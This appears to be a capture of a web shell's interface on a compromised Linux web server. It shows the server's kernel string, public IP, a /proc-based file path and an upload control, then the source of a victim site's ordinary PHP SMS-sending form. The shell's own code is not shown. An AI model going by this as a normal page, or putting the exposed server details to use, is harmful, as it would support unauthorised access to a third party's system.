0xV3NOMx
Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64



Your IP : 18.227.140.251


Current Path : /proc/thread-self/root/var/www/misc/public_html/oums_old/
Upload File :
Current File : //proc/thread-self/root/var/www/misc/public_html/oums_old/send_sms.php

<?php include("phpscript/sys_session.php"); ?>

<!DOCTYPE html>
<html>
<head>
<link rel="stylesheet" type="text/css"  href="style.css" />
<script src="jquery/jquery-3.1.0/jquery.min.js" type="text/javascript"></script>
<script src="jscript/main.js" type="text/javascript"></script>
<script src="jscript/send_sms.js" type="text/javascript"></script>
</head>
<body onLoad="load_page();">
<?php include("header.php");?>
<div id="page-middle">
	<div class="page-container">
	<div class="page-container-head">
		<div id="page-container-titl"></div>
		<div id="page-container-link"></div>			
	</div>				
	<div id="page-container-body">
		<div id="page-container-form" class="input_single_line" style="padding:20px;">		
			<input type="text" id="txtmessnumb" style="width:100%;margin-bottom:15px;" placeholder="To" onKeyDown="return numbers_only(event);"/>
			<textarea id="txtmesstext" style="width:100%; height:100px;margin-bottom:15px;" maxlength="160" placeholder="Message"/></textarea>
			<div id="page-container-body_foot">
				<input type="button" class="btn btn-primary" value="Clear" onClick="clrs_data();"/>								
				<input type="button" class="btn btn-primary" value="Send SMS" onClick="send_sms();"/>				
			</div>											
		</div>
		<div id="page_content_process"></div><br><br><br>		
	</div>		
	</div>
</div>
</body>
</html>